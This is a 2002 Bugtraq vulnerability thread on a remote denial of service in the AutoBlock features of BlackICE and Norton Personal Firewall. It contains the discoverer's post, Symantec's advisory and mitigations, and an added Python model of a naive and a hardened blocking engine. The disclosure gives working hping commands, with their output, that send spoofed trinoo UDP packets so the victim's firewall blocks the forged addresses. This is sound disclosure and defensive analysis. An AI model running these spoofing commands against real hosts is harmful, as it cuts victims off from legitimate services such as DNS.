Re: Multiple Vendor PC firewall remote denial of services Vulnerability

2002-10-10 Thread Sym Security


Ref: Bugtraq message,  Multiple Vendor PC firewall remote denial of
services Vulnerability,
Date:  Oct 8 2002 2:16AM
Author:  Yiming Gong <[EMAIL PROTECTED]>
Message-ID:  <002701c26e70$a882eba0$f8ff1dda@penetrat>

Overview
In a default installation, some personal firewall software runs with the
auto-block function on. If you send a fake high-risk attack packet with a
spoofed source address to such a PC, the firewall will immediately block the
spoofed IP address without any further judgement. Thus an intruder might
quickly block a great many Internet addresses for a victim PC remotely.

Example
I've tested this on BlackICE and Norton Personal Firewall.

-snip



October 9, 2002

Symantec Personal Firewall AutoBlock DoS

Risk
Low

Overview

Symantec was notified of a potential denial-of-service (DoS) issue with
Symantec Norton Personal Firewall's AutoBlock feature.  The discoverer,
Yiming Gong, China Netcom, subsequently posted the findings to the BugTraq
mailing list
(http://online.securityfocus.com/archive/1/294411/2002-10-06/2002-10-12/0)
prior to a coordinated response from Symantec.  According to the
discoverer, by directing an attack against a user of a personal firewall
providing a form of auto-blocking capability and by spoofing a valid IP
address, an attacker could potentially create a DoS of that address when
the AutoBlock feature blocks access to the IP address for a period of time.
In this manner, a valid IP address could possibly be temporarily denied to
the user of the personal firewall.

Products/Versions
Symantec Norton Personal Firewall 2002
Symantec Norton Personal Firewall 2003
Symantec Norton Internet Security 2002
Symantec Norton Internet Security 2003

Symantec Response

Symantec considers the AutoBlock feature of their personal firewall
products to be a valuable part of any Internet security capability.  While
the scenario described in the referenced Bugtraq posting could cause a
minor temporary DoS, a concerted attack of this type would, by its very
nature be of limited scope.  The default timeout for AutoBlock is 30
minutes so even if an IP address were to be blocked in this manner, it
would be for a limited period.

Symantec's AutoBlock feature does provide an exclusion list so that, should
a user become aware of a spoofed DoS attack of this nature, they could
place the valid IP address in the AutoBlock exclusion list to prevent the
valid site from being blocked automatically.  The attack packets from the
spoofed IP address used in the DoS attempt would still be intercepted by
the firewall, but the intended DoS by the attacker would be thwarted.

However, while Symantec considers a threat of this nature to be very low
risk and highly limited in scope, we are continuously working to increase
the security capability and posture of our products.  Symantec is
researching ways of building additional intelligent decision capability
into our AutoBlock feature.

Credit

Symantec takes the security and proper functionality of our products very
seriously.  Anyone with information on security issues with Symantec
products should contact [EMAIL PROTECTED]


Copyright (c) 2002 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long as
it is not edited in any way unless authorized by Symantec Security
Response. Reprinting the whole or part of this alert in medium other than
electronically requires permission from [EMAIL PROTECTED]

Disclaimer
The information in the advisory is believed to be accurate at the time of
printing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or consequential
loss or damage arising from use of, or reliance on this information.
Symantec, Symantec products, Symantec Security Response, and SymSecurity
are registered trademarks of Symantec Corp. and/or affiliated companies in
the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole property
of their respective companies/owners.


Multiple Vendor PC firewall remote denial of services Vulnerability

2002-10-08 Thread Yiming Gong

Overview
In a default installation, some personal firewall software runs with the
auto-block function on. If you send a fake high-risk attack packet with a
spoofed source address to such a PC, the firewall will immediately block the
spoofed IP address without any further judgement. Thus an intruder might
quickly block a great many Internet addresses for a victim PC remotely.

Example
I've tested this on BlackICE and Norton Personal Firewall.

Below are the steps and results of the test on BlackICE.

step 1: A clean and DEFAULT installation of BlackICE Defender for Server
(version 2.9.cap) on a Win2k Server PC, whose IP address is ip.add.of.victim.

step 2: On a Linux box with hping (free software, available from
www.hping.org) installed, perform the following three commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing: send fake trinoo communication
UDP packets to our target machine ip.add.of.victim with a spoofed source IP
address (google, networkice, and ip.add.of.dnsserver, our DNS server).

result: Each time the command was executed, the BlackICE icon in the Windows
system tray flashed, and an entry was added automatically in BlackICE's
Advanced Firewall Settings which blocks all packets from the spoofed
address. The spoofed IP address became unreachable immediately.

The test steps and results for Norton Personal Firewall are almost the
same, using
hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address
instead.

Vendor Response
I contacted [EMAIL PROTECTED] and [EMAIL PROTECTED] on Sep 24, 2002.
Symantec told me they had forwarded my concerns on to the appropriate
team, and BlackICE replied that, as the product exists now, there is
nothing that can be done to correct this, and that they hope something
can be done in a future release.

Affected Versions:
--
I have tested the following products:

BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.


-- 
I want a better life



Yiming Gong 
Senior System Administrator 
China Netcom
[EMAIL PROTECTED] 
http://security.zz.ha.cn 
0086-371-7934907
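
The following Python model is an added example and is not code from BlackICE,
Norton Personal Firewall, Symantec or the original poster. It reproduces the
decision the two messages above describe (any packet matching an attack
signature gets its claimed source address blocked, so a forged trinoo PONG
from the victim's DNS server address cuts the victim off from DNS) next to a
hardened engine that applies Symantec's two mitigations, the AutoBlock
exclusion list and the 30-minute block expiry, plus one design change neither
product is said to have: an address is only blocked when the peer has proven
it actually receives traffic at that address (a completed TCP handshake),
since a lone UDP datagram proves nothing about its source field. The UDP/31335
"PONG" signature and the 30-minute timeout come from the posts; the RFC 5737
test addresses, the TCP/23 signature, the handshake flag and the packet records
are constructed for this example.

```python
"""Model of a personal-firewall AutoBlock decision engine (added example).

NaiveAutoBlock    - the behaviour described in the posts: block the *claimed*
                    source of any packet that matches an attack signature.
HardenedAutoBlock - same signatures, but honours an exclusion list, expires
                    blocks after the 30-minute default timeout, and refuses to
                    block an address on the strength of spoofable traffic.
"""
from dataclasses import dataclass

AUTOBLOCK_TIMEOUT_S = 30 * 60  # default AutoBlock timeout quoted by Symantec

# (proto, dst port, payload prefix) -> signature name.
# UDP/31335 "PONG" is the trinoo daemon reply forged by the post's hping command.
# UDP/2140 "13" mirrors the port/payload of the post's Norton test command.
# The TCP/23 entry is constructed for this example.
SIGNATURES = {
    ("udp", 31335, b"PONG"): "trinoo daemon PONG",
    ("udp", 2140, b"13"): "UDP/2140 probe (Norton test)",
    ("tcp", 23, b""): "telnet probe (constructed)",
}


@dataclass
class Packet:
    src: str                          # source address as written on the wire
    proto: str                        # "udp" or "tcp"
    dport: int
    payload: bytes = b""
    handshake_complete: bool = False  # TCP only: 3-way handshake with src finished
    ts: float = 0.0                   # seconds since start of capture


def match_signature(pkt):
    """Return the name of the signature the packet matches, or None."""
    for (proto, dport, prefix), name in SIGNATURES.items():
        if pkt.proto == proto and pkt.dport == dport and pkt.payload.startswith(prefix):
            return name
    return None


class NaiveAutoBlock:
    """Block the claimed source of every signature match, no further judgement."""

    def __init__(self):
        self.blocked = {}  # src address -> block expiry timestamp

    def observe(self, pkt):
        if match_signature(pkt) is None:
            return "pass"
        self.blocked[pkt.src] = pkt.ts + AUTOBLOCK_TIMEOUT_S
        return "blocked"

    def is_blocked(self, src, now):
        expiry = self.blocked.get(src)
        return expiry is not None and now < expiry


class HardenedAutoBlock(NaiveAutoBlock):
    """Drop the offending packet always; block the address only on real evidence."""

    def __init__(self, exclusions=()):
        super().__init__()
        self.exclusions = set(exclusions)  # Symantec's AutoBlock exclusion list

    def observe(self, pkt):
        if match_signature(pkt) is None:
            return "pass"
        if pkt.src in self.exclusions:
            return "dropped:excluded"  # packet intercepted, address never blocked
        if pkt.proto != "tcp" or not pkt.handshake_complete:
            # A lone UDP datagram or a bare SYN carries no proof that the source
            # field is genuine, so punishing that address would punish a bystander.
            return "dropped:unverified-source"
        self.blocked[pkt.src] = pkt.ts + AUTOBLOCK_TIMEOUT_S
        return "blocked"


def demo():
    """Replay the posts' scenario on constructed records through both engines."""
    dns, google, attacker = "192.0.2.53", "192.0.2.80", "198.51.100.7"  # RFC 5737
    traffic = [
        Packet(dns, "udp", 31335, b"PONG", ts=0.0),                  # spoofed as DNS server
        Packet(google, "udp", 31335, b"PONG", ts=1.0),               # spoofed as web server
        Packet(attacker, "tcp", 23, handshake_complete=True, ts=2.0),  # attacker's real address
    ]
    naive, hardened = NaiveAutoBlock(), HardenedAutoBlock(exclusions={dns})
    decisions = [(naive.observe(p), hardened.observe(p)) for p in traffic]
    now = 60.0
    return {
        "decisions": decisions,
        "naive_blocks_dns": naive.is_blocked(dns, now),
        "naive_blocks_google": naive.is_blocked(google, now),
        "hardened_blocks_dns": hardened.is_blocked(dns, now),
        "hardened_blocks_google": hardened.is_blocked(google, now),
        "both_block_attacker": naive.is_blocked(attacker, now) and hardened.is_blocked(attacker, now),
        "dns_free_after_timeout": not naive.is_blocked(dns, AUTOBLOCK_TIMEOUT_S + 1),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two points the model makes concrete. First, "dropped" is not "ignored": in both
engines the forged packet itself never reaches the host, which is the part
Symantec notes still works even with an exclusion entry; what the hardened
engine withholds is the punitive block on the claimed address. Second, the
exclusion list is reactive, because the user has to notice the outage and know
which address to exclude, whereas the handshake rule removes the spoofed-UDP
case outright; an attacker who can complete a TCP handshake is using an address
they actually hold, so blocking it costs the victim nothing legitimate.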